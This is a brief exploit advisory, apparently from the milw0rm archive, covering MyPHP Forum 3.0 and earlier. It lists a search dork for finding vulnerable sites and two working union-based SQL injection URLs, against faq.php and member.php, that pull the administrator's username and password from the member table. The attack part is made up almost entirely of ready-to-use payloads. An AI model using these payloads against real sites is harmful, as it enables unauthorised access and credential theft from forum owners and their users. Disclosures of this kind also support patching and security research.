Name : MyPHP Forum <= 3.0 (Final) Multiple Remote SQL Injection Vulnerability Author : x0kster Email : x0kster@gmail.com Site : ihteam.net Script Download : http://www.myphp.ws/ Date : 31/12/2007 Dork : "Powered by: MyPHP Forum" Note: For work, magic_quotes_gpc must be turned off on the server. Usally the table prefix is 'nb'. Sql injection in faq.php So we can execute an sql injection thrught the bugged variable $id. PoC: http://Site/faq.php?action=view&id=-1'+union+select+1,concat(username,0x3a,password),3+from+{table_prefix}_member+where+uid=1/* Sql injection in member.php So $member variable isn't controlled so we can exploit it. PoC: http://Site/member.php?action=viewpro&member=-1'+union+select+1,2,3,4,5,6,7,8,9,concat(username,0x3a,password),11,12,13,14,15,16,17,18,19,20,21,22+from+{table_prefix}_member+where+uid=1/* # milw0rm.com [2007-12-31]